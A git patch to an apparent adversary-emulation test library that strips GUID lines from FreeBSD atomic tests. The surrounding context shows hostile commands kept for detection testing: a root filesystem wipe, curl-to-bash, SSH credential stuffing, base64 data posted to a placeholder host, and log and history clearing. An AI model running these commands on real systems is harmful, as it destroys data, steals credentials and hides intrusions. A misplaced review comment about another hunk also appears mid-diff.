From 3b8d0af30222caeb41f50f9d1f452542fef28e6b Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alonso=20C=C3=A1rdenas?= Date: Fri, 9 Jun 2023 09:11:41 -0500 Subject: [PATCH] Remove auto_generated_guid lines from new entries Some other tiny modifications --- atomics/T1003.007/T1003.007.yaml | 1 - atomics/T1003.008/T1003.008.yaml | 1 - atomics/T1007/T1007.yaml | 1 - atomics/T1016/T1016.yaml | 1 - atomics/T1018/T1018.yaml | 1 - atomics/T1027/T1027.yaml | 1 - atomics/T1036.006/T1036.006.yaml | 1 - atomics/T1037.004/T1037.004.yaml | 1 - atomics/T1040/T1040.yaml | 3 --- atomics/T1046/T1046.yaml | 1 - atomics/T1048.003/T1048.003.yaml | 1 - atomics/T1053.002/T1053.002.yaml | 1 - atomics/T1053.003/T1053.003.yaml | 1 - atomics/T1056.001/T1056.001.yaml | 1 - atomics/T1059.004/T1059.004.yaml | 4 ---- atomics/T1070.002/T1070.002.yaml | 7 +------ atomics/T1070.003/T1070.003.yaml | 7 ------- atomics/T1070.004/T1070.004.yaml | 1 - atomics/T1074.001/T1074.001.yaml | 1 - atomics/T1078.003/T1078.003.yaml | 3 --- atomics/T1082/T1082.yaml | 2 -- atomics/T1087.001/T1087.001.yaml | 1 - atomics/T1090.003/T1090.003.yaml | 1 - atomics/T1110.001/T1110.001.yaml | 1 - atomics/T1110.004/T1110.004.yaml | 1 - atomics/T1113/T1113.yaml | 2 -- atomics/T1132.001/T1132.001.yaml | 1 - atomics/T1135/T1135.yaml | 1 - atomics/T1136.001/T1136.001.yaml | 2 -- atomics/T1140/T1140.yaml | 2 -- atomics/T1201/T1201.yaml | 1 - atomics/T1217/T1217.yaml | 1 - atomics/T1222.002/T1222.002.yaml | 3 --- atomics/T1497.001/T1497.001.yaml | 1 - atomics/T1518.001/T1518.001.yaml | 1 - atomics/T1529/T1529.yaml | 2 -- atomics/T1543.002/T1543.002.yaml | 1 - atomics/T1546.004/T1546.004.yaml | 1 - atomics/T1546.005/T1546.005.yaml | 2 -- atomics/T1548.001/T1548.001.yaml | 3 --- atomics/T1548.003/T1548.003.yaml | 3 --- atomics/T1552.003/T1552.003.yaml | 1 - atomics/T1552.004/T1552.004.yaml | 3 --- atomics/T1553.004/T1553.004.yaml | 1 - atomics/T1556.003/T1556.003.yaml | 1 - atomics/T1562.001/T1562.001.yaml | 1 - atomics/T1562.003/T1562.003.yaml | 3 --- atomics/T1562.004/T1562.004.yaml | 2 -- 
atomics/T1562.006/T1562.006.yaml | 2 -- 49 files changed, 1 insertion(+), 85 deletions(-) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index ea2dc013..51ab58d2 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -49,7 +49,6 @@ atomic_tests: rm -f "#{output_file}" - name: Dump individual process memory with sh on FreeBSD (Local) - auto_generated_guid: description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml index 84ffb4f1..f5c06ca8 100644 --- a/atomics/T1003.008/T1003.008.yaml +++ b/atomics/T1003.008/T1003.008.yaml @@ -21,7 +21,6 @@ atomic_tests: name: bash elevation_required: true - name: Access /etc/master.passwd (Local) - auto_generated_guid: description: | /etc/master.passwd file is accessed in FreeBSD environments supported_platforms: diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 4ac8c24c..34ffdb8e 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -46,7 +46,6 @@ atomic_tests: systemctl --type=service name: bash - name: System Service Discovery - service - auto_generated_guid: description: | Enumerates system service using service supported_platforms: diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index 397fc2a4..106f8990 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -54,7 +54,6 @@ atomic_tests: if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; name: sh - name: System Network Configuration Discovery (freebsd) - auto_generated_guid: description: | Identify network configuration information. 
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 9d919fbd..2f046541 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -283,7 +283,6 @@ atomic_tests: name: sh - name: Remote System Discovery - netstat - auto_generated_guid: description: | Use the netstat command to display the kernels routing tables. supported_platforms: diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index e51db13c..6effa3fc 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -34,7 +34,6 @@ atomic_tests: rm /tmp/art.sh name: sh - name: Decode base64 Data into Script - auto_generated_guid: description: | Creates a base64-encoded data file and decodes it into an executable shell script diff --git a/atomics/T1036.006/T1036.006.yaml b/atomics/T1036.006/T1036.006.yaml index 131a0a67..8799461d 100644 --- a/atomics/T1036.006/T1036.006.yaml +++ b/atomics/T1036.006/T1036.006.yaml @@ -34,7 +34,6 @@ atomic_tests: cleanup_command: rm -rf /tmp/atomic-test-T1036.006 - name: Space After Filename (FreeBSD) - auto_generated_guid: description: | Space after filename. supported_platforms: diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 53e89190..b93a5a12 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -54,7 +54,6 @@ atomic_tests: cleanup_command: | origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - name: rc.local (FreeBSD) - auto_generated_guid: description: | Modify rc.local diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 6d209a69..78b6c612 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml 
@@ -29,7 +29,6 @@ atomic_tests: name: bash elevation_required: true - name: Packet Capture FreeBSD using tshark or tcpdump - auto_generated_guid: description: | Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. @@ -248,7 +247,6 @@ atomic_tests: name: bash elevation_required: true - name: Packet Capture FreeBSD using /dev/bpfN with sudo - auto_generated_guid: description: | Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds. supported_platforms: @@ -282,7 +280,6 @@ atomic_tests: name: sh elevation_required: true - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo - auto_generated_guid: description: | Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds. supported_platforms: diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index f79a2dfd..2b42ff2e 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -69,7 +69,6 @@ atomic_tests: name: sh elevation_required: true - name: Port Scan Nmap for FreeBSD - auto_generated_guid: description: | Scan ports to check for listening ports with Nmap. diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index c816bc16..52e73474 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -219,7 +219,6 @@ atomic_tests: command: | if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi - name: Python3 http.server (freebsd) - auto_generated_guid: description: | An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable. supported_platforms: diff --git a/atomics/T1053.002/T1053.002.yaml b/atomics/T1053.002/T1053.002.yaml index 5b58cf0a..727f0722 100644 
--- a/atomics/T1053.002/T1053.002.yaml +++ b/atomics/T1053.002/T1053.002.yaml @@ -55,7 +55,6 @@ atomic_tests: command: |- echo "#{at_command}" | at #{time_spec} - name: At - Schedule a job freebsd - auto_generated_guid: description: | This test submits a command to be run in the future by the `at` daemon. diff --git a/atomics/T1053.003/T1053.003.yaml b/atomics/T1053.003/T1053.003.yaml index db20530b..43551d31 100644 --- a/atomics/T1053.003/T1053.003.yaml +++ b/atomics/T1053.003/T1053.003.yaml @@ -55,7 +55,6 @@ atomic_tests: rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} - name: Cron - Add script to /etc/cron.d folder - auto_generated_guid: description: | This test adds a script to /etc/cron.d folder configured to execute on a schedule. supported_platforms: diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index f060580c..40406db9 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -88,7 +88,6 @@ atomic_tests: cleanup_command: | unset PROMPT_COMMAND - name: Logging sh history to syslog/messages - auto_generated_guid: description: | There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index b3067f67..c5c0b641 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml 
@@ -169,7 +169,6 @@ atomic_tests: echo -n "$ART" |base64 -d |/bin/bash unset ART - name: Obfuscated command line scripts (freebsd) - auto_generated_guid: description: | An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed. supported_platforms: @@ -206,7 +205,6 @@ atomic_tests: cleanup_command: | userdel art - name: Change login shell (freebsd) - auto_generated_guid: description: | An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. supported_platforms: @@ -243,7 +241,6 @@ atomic_tests: cleanup_command: | unset ART - name: Environment variable scripts (freebsd) - auto_generated_guid: description: | An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh supported_platforms: 
@@ -290,7 +287,6 @@ atomic_tests: rm /tmp/art.txt - name: Detecting pipe-to-shell (freebsd) - auto_generated_guid: description: | An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command. supported_platforms: diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index 62aa9983..ecbd413d 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -15,7 +15,6 @@ atomic_tests: name: sh elevation_required: true - name: rm -rf - auto_generated_guid: description: | Delete messages and security logs supported_platforms: @@ -52,7 +51,6 @@ atomic_tests: name: sh elevation_required: true - name: Truncate system log files via truncate utility (freebsd) - auto_generated_guid: description: | This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content supported_platforms: @@ -77,7 +75,6 @@ atomic_tests: name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) - auto_generated_guid: description: | The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility supported_platforms: 
@@ -114,7 +111,6 @@ atomic_tests: name: sh elevation_required: true - name: Overwrite FreeBSD system log via echo utility - auto_generated_guid: description: | This test overwrites the contents of system log file with an empty string using echo utility supported_platforms: @@ -148,11 +144,10 @@ atomic_tests: name: sh elevation_required: true - name: Delete system log files via unlink utility (freebsd) - auto_generated_guid: description: | This test deletes the messages log file using unlink utility supported_platforms: - - macos + - freebsd executor: command: | unlink /var/log/messages diff --git a/atomics/T1070.003/T1070.003.yaml b/atomics/T1070.003/T1070.003.yaml index fd465424..e32209dc 100644 --- a/atomics/T1070.003/T1070.003.yaml +++ b/atomics/T1070.003/T1070.003.yaml @@ -13,7 +13,6 @@ atomic_tests: rm ~/.bash_history name: sh - name: Clear sh history (rm) - auto_generated_guid: description: | Clears sh history via rm supported_platforms: @@ -34,7 +33,6 @@ atomic_tests: echo "" > ~/.bash_history name: sh - name: Clear sh history (echo) - auto_generated_guid: description: | Clears sh history via echo supported_platforms: @@ -55,7 +53,6 @@ atomic_tests: cat /dev/null > ~/.bash_history name: sh - name: Clear sh history (cat dev/null) - auto_generated_guid: description: | Clears sh history via cat /dev/null supported_platforms: @@ -77,7 +74,6 @@ atomic_tests: ln -sf /dev/null ~/.bash_history name: sh - name: Clear sh history (ln dev/null) - auto_generated_guid: description: | Clears sh history via a symlink to /dev/null supported_platforms: @@ -97,7 +93,6 @@ atomic_tests: truncate -s0 ~/.bash_history name: sh - name: Clear sh history (truncate) - auto_generated_guid: description: | Clears sh history via truncate supported_platforms: 
@@ -120,7 +115,6 @@ atomic_tests: history -c name: sh - name: Clear history of a bunch of shells (freebsd) - auto_generated_guid: description: | Clears the history of a bunch of different shell types by setting the history size to zero supported_platforms: @@ -188,7 +182,6 @@ atomic_tests: name: sh - name: Disable sh History Logging with SSH -T (freebsd) - auto_generated_guid: description: | Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog supported_platforms: diff --git a/atomics/T1070.004/T1070.004.yaml b/atomics/T1070.004/T1070.004.yaml index 44f377c0..59e92647 100644 --- a/atomics/T1070.004/T1070.004.yaml +++ b/atomics/T1070.004/T1070.004.yaml @@ -178,7 +178,6 @@ atomic_tests: rm -rf / --no-preserve-root > /dev/null 2> /dev/null name: bash - name: Delete Filesystem - FreeBSD - auto_generated_guid: description: | This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. supported_platforms: diff --git a/atomics/T1074.001/T1074.001.yaml b/atomics/T1074.001/T1074.001.yaml index db12c8e3..d5a24d71 100644 --- a/atomics/T1074.001/T1074.001.yaml +++ b/atomics/T1074.001/T1074.001.yaml @@ -36,7 +36,6 @@ atomic_tests: curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} name: bash - name: Stage data from Discovery.sh (freebsd) - auto_generated_guid: description: | Utilize curl to download discovery.sh and execute a basic information gathering shell script supported_platforms: diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index ee141b12..7f6a2004 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml 
@@ -119,7 +119,6 @@ atomic_tests: cleanup_command: | userdel -r art - name: Create local account (FreeBSD) - auto_generated_guid: description: | An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user. supported_platforms: @@ -158,7 +157,6 @@ atomic_tests: cleanup_command: | userdel -r art - name: Reactivate a locked/expired account (FreeBSD) - auto_generated_guid: description: | A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. @@ -202,7 +200,6 @@ atomic_tests: cat /etc/passwd |grep nobody # -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin - name: Login as nobody (freebsd) - auto_generated_guid: description: | An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. supported_platforms: diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 08ec281d..c542540b 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -81,7 +81,6 @@ atomic_tests: sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" name: bash - name: FreeBSD VM Check via Kernel Modules - auto_generated_guid: description: | Identify virtual machine host kernel modules. supported_platforms: @@ -363,7 +362,6 @@ atomic_tests: grep vmw /proc/modules name: sh - name: FreeBSD List Kernel Modules - auto_generated_guid: description: | Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present. supported_platforms: 
diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index b99f1b18..973a2d62 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -110,7 +110,6 @@ atomic_tests: rm -f #{output_file} name: sh - name: Show if a user account has ever logged in remotely (freebsd) - auto_generated_guid: description: | Show if a user account has ever logged in remotely supported_platforms: diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index 8c25c9bf..1b48754c 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml @@ -116,7 +116,6 @@ atomic_tests: killall tor > /dev/null 2>&1 name: sh - name: Tor Proxy Usage - FreeBSD - auto_generated_guid: description: | This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index e1b76f0e..7ab2ee4c 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -226,7 +226,6 @@ atomic_tests: userdel -fr art - name: SUDO Brute Force - FreeBSD - auto_generated_guid: description: | An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 78be3827..2cddf2fa 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml 
@@ -64,7 +64,6 @@ atomic_tests: for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done - name: SSH Credential Stuffing From FreeBSD - auto_generated_guid: description: | Using username,password combination from a password dump to login over SSH. diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index f7cc606b..0abd44c9 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -70,7 +70,6 @@ atomic_tests: rm #{output_file} name: bash - name: X Windows Capture (freebsd) - auto_generated_guid: description: | Use xwd command to collect a full desktop screenshot and review file with xwud supported_platforms: @@ -122,7 +121,6 @@ atomic_tests: rm #{output_file} name: bash - name: Capture Linux Desktop using Import Tool (freebsd) - auto_generated_guid: description: | Use import command from ImageMagick to collect a full desktop screenshot supported_platforms: diff --git a/atomics/T1132.001/T1132.001.yaml b/atomics/T1132.001/T1132.001.yaml index 711f109b..d5d8e760 100644 --- a/atomics/T1132.001/T1132.001.yaml +++ b/atomics/T1132.001/T1132.001.yaml @@ -23,7 +23,6 @@ atomic_tests: curl -XPOST #{base64_data}.#{destination_url} name: sh - name: Base64 Encoded data (freebsd) - auto_generated_guid: description: | Utilizing a common technique for posting base64 encoded data. supported_platforms: diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 428e6017..1059b696 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -47,7 +47,6 @@ atomic_tests: name: bash elevation_required: true - name: Network Share Discovery - FreeBSD - auto_generated_guid: description: | Network Share Discovery using smbstatus supported_platforms: diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index 85305104..f0194521 100644 --- a/atomics/T1136.001/T1136.001.yaml 
+++ b/atomics/T1136.001/T1136.001.yaml @@ -20,7 +20,6 @@ atomic_tests: name: bash elevation_required: true - name: Create a user account on a FreeBSD system - auto_generated_guid: description: | Create a user via pw supported_platforms: @@ -130,7 +129,6 @@ atomic_tests: name: bash elevation_required: true - name: Create a new user in FreeBSD with `root` GID. - auto_generated_guid: description: | Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. supported_platforms: diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml index 81e60bc7..d2e46192 100644 --- a/atomics/T1140/T1140.yaml +++ b/atomics/T1140/T1140.yaml @@ -139,7 +139,6 @@ atomic_tests: echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" - name: Base64 decoding with shell utilities (freebsd) - auto_generated_guid: description: | Use common shell utilities to decode a base64-encoded text string and echo it to the console supported_platforms: @@ -166,7 +165,6 @@ atomic_tests: echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r - name: FreeBSD b64encode Shebang in CLI - auto_generated_guid: description: | Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. supported_platforms: diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml index 7fa2a09b..d790c8e9 100644 --- a/atomics/T1201/T1201.yaml 
+++ b/atomics/T1201/T1201.yaml @@ -12,7 +12,6 @@ atomic_tests: cat /etc/pam.d/common-password name: bash - name: Examine password complexity policy - FreeBSD - auto_generated_guid: description: | Lists the password complexity policy to console on FreeBSD. supported_platforms: diff --git a/atomics/T1217/T1217.yaml b/atomics/T1217/T1217.yaml index 1f9941f6..44c55557 100644 --- a/atomics/T1217/T1217.yaml +++ b/atomics/T1217/T1217.yaml @@ -57,7 +57,6 @@ atomic_tests: rm -f #{output_file} 2>/dev/null name: sh - name: List Google Chromium Bookmark JSON Files on FreeBSD - auto_generated_guid: description: | Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file. supported_platforms: diff --git a/atomics/T1222.002/T1222.002.yaml b/atomics/T1222.002/T1222.002.yaml index d6322db1..13bc9143 100644 --- a/atomics/T1222.002/T1222.002.yaml +++ b/atomics/T1222.002/T1222.002.yaml @@ -192,7 +192,6 @@ atomic_tests: chattr -i #{file_to_modify} name: sh - name: chflags - Remove immutable file attribute - auto_generated_guid: description: | Remove's a file's `immutable` attribute using `chflags`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. @@ -238,7 +237,6 @@ atomic_tests: #{compiled_file} /tmp/ T1222002 name: sh - name: Chmod through c script (freebsd) - auto_generated_guid: description: | chmods a file using a c script supported_platforms: @@ -295,7 +293,6 @@ atomic_tests: name: sh elevation_required: true - name: Chown through c script (freebsd) - auto_generated_guid: description: | chowns a file to root using a c script supported_platforms: diff --git a/atomics/T1497.001/T1497.001.yaml b/atomics/T1497.001/T1497.001.yaml index 638e71a2..e2592c64 100644 --- a/atomics/T1497.001/T1497.001.yaml +++ b/atomics/T1497.001/T1497.001.yaml 
@@ -16,7 +16,6 @@ atomic_tests: if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi; - name: Detect Virtualization Environment (FreeBSD) - auto_generated_guid: description: | Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml index e449c38a..1c9fefde 100644 --- a/atomics/T1518.001/T1518.001.yaml +++ b/atomics/T1518.001/T1518.001.yaml @@ -64,7 +64,6 @@ atomic_tests: ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd' name: sh - name: Security Software Discovery - pgrep (FreeBSD) - auto_generated_guid: description: | Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml index 347f0ff6..e3e00fa9 100644 --- a/atomics/T1529/T1529.yaml +++ b/atomics/T1529/T1529.yaml @@ -95,7 +95,6 @@ atomic_tests: name: sh elevation_required: true - name: Reboot System via `halt` - FreeBSD - auto_generated_guid: description: | This test restarts a FreeBSD system using `halt`. supported_platforms: @@ -129,7 +128,6 @@ atomic_tests: name: sh elevation_required: true - name: Reboot System via `poweroff` - FreeBSD - auto_generated_guid: description: | This test restarts a FreeBSD system using `poweroff`. supported_platforms: diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index 88ca9f37..3c515f95 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml 
@@ -66,7 +66,6 @@ atomic_tests: systemctl daemon-reload name: bash - name: Create Systemd Service - auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c description: | This test creates a Systemd service unit file and enables it as a service. supported_platforms: diff --git a/atomics/T1546.004/T1546.004.yaml b/atomics/T1546.004/T1546.004.yaml index 8cf6b28f..4c5e4818 100644 --- a/atomics/T1546.004/T1546.004.yaml +++ b/atomics/T1546.004/T1546.004.yaml @@ -40,7 +40,6 @@ atomic_tests: mv /tmp/T1546.004 ~/.bashrc name: sh - name: Add command to .shrc - auto_generated_guid: description: | Adds a command to the .shrc file of the current user supported_platforms: diff --git a/atomics/T1546.005/T1546.005.yaml b/atomics/T1546.005/T1546.005.yaml index 9ab2d6c4..bd2c6a09 100644 --- a/atomics/T1546.005/T1546.005.yaml +++ b/atomics/T1546.005/T1546.005.yaml @@ -16,7 +16,6 @@ atomic_tests: rm -f /tmp/art-fish.txt name: sh - name: Trap EXIT (freebsd) - auto_generated_guid: description: | Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt @@ -51,7 +50,6 @@ atomic_tests: rm -f /tmp/art-fish.txt name: sh - name: Trap SIGINT (freebsd) - auto_generated_guid: description: | Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt diff --git a/atomics/T1548.001/T1548.001.yaml b/atomics/T1548.001/T1548.001.yaml index 610d14c2..ca39e7e6 100644 --- a/atomics/T1548.001/T1548.001.yaml +++ b/atomics/T1548.001/T1548.001.yaml @@ -27,7 +27,6 @@ atomic_tests: name: sh elevation_required: true - name: Make and modify binary from C source (freebsd) - auto_generated_guid: description: | Make, change owner, and change file attributes on a C source code file supported_platforms: 
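Review bot: The key removed in this hunk of atomics/T1543.002/T1543.002.yaml carries a value, `auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c`, unlike the empty `auto_generated_guid:` keys deleted in every other hunk of the patch, so it is not the "new entries" case the commit message describes. If `Create Systemd Service` is the pre-existing Linux test, that GUID is presumably what runners and detection mappings use to select the test, and dropping it will leave the generator to mint a new one and silently break those references; if it is instead a new FreeBSD copy whose GUID was duplicated from the original, the deletion is right but the two identically named entries should be told apart, e.g. `- name: Create Systemd Service (freebsd)`. Either way the commit message should say why a populated GUID is removed here. The enclosing `atomic_tests` sequence starts and ends outside the hunk.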
@@ -72,7 +71,6 @@ atomic_tests: name: sh elevation_required: true - name: Set a SetUID flag on file (freebsd) - auto_generated_guid: description: | This test sets the SetUID flag on a file in FreeBSD. supported_platforms: @@ -113,7 +111,6 @@ atomic_tests: name: sh elevation_required: true - name: Set a SetGID flag on file (freebsd) - auto_generated_guid: description: | This test sets the SetGID flag on a file in FreeBSD. supported_platforms: diff --git a/atomics/T1548.003/T1548.003.yaml b/atomics/T1548.003/T1548.003.yaml index 49ff0c29..c7288ea0 100644 --- a/atomics/T1548.003/T1548.003.yaml +++ b/atomics/T1548.003/T1548.003.yaml @@ -21,7 +21,6 @@ atomic_tests: sudo vim /etc/sudoers - name: Sudo usage (freebsd) - auto_generated_guid: description: | Common Sudo enumeration methods. @@ -63,7 +62,6 @@ atomic_tests: sudo visudo -c -f /etc/sudoers - name: Unlimited sudo cache timeout (freebsd) - auto_generated_guid: description: | Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. @@ -104,7 +102,6 @@ atomic_tests: sudo visudo -c -f /etc/sudoers - name: Disable tty_tickets for sudo caching (freebsd) - auto_generated_guid: description: | Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. diff --git a/atomics/T1552.003/T1552.003.yaml b/atomics/T1552.003/T1552.003.yaml index aabac68c..39e33f67 100644 --- a/atomics/T1552.003/T1552.003.yaml +++ b/atomics/T1552.003/T1552.003.yaml @@ -26,7 +26,6 @@ atomic_tests: cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} name: sh - name: Search Through sh History - auto_generated_guid: description: | Search through sh history 